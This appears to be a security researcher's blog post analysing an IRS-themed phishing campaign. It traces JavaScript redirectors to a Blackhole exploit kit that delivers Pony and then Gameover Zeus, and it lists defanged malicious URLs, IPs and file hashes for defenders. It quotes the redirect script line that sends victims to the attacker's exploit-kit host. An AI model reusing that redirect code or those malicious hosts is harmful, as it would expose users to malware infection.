IRS – Your tax appeal is rejected.

Subject: Your tax appeak is rejected.
URL: hxxp://morningdeals[.]net/ZseUkSLa/index.html

Your tax appeal is rejected.

The text ‘Online Tax Appeal’ contains a hyperlink to a URL as shown above. This page contains no content but only 4 JS:

badigames[.]net /YRQnqzee/js.js
hermandaddepasion[.]com /63x21NoX/js.js
http://www.techhome.rmutk.ac[.]th /8vVWAm9s/js.js
http://www.trakter4u[.]gr /dLYd6p1U/js.js

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 207.210.65.109:

document.location=’hxxp://tradercircuit[.]com/showthread.php?t=73a07bcb51f4be71′;

It first downloaded Pony downloader from the following location:

tradercircuit[.]com /q.php?f=e4a98&e=2

File: info.exe
MD5:623d391863770fd11a51f564a655cfc0
Size: 95,392 bytes

This pony downloader variant was also configured to download Gameover Zeus binaries from the following locations:

layout.cnt[.]br /3ZD7ArbR/rnzj80FK.exe —> hosted at IP address 187.45.216.36
kucukagaanaokulu.k12[.]tr /5hxYiCGM/DLsp9.exe —> hosted at IP address 94.102.1.94
beyondcreativehm[.]com /MnFUS9Ah/PVzKLHf.exe —> hosted at IP address 69.89.31.99

All of these files were same with following properties:

File: rnzj80FK.exe/DLsp9.exe/PVzKLHf.exe
MD5: 4bf9cca55ff576e91c1fd4a2c2d35ff1
Size: 2,78,528 bytes
Other: This file is digitally signed by ‘66666666’
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal.com. The Gameover Zeus variant posts to a dropzone at 78.229.28.1 over port 28598. It had CID of “3004”.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: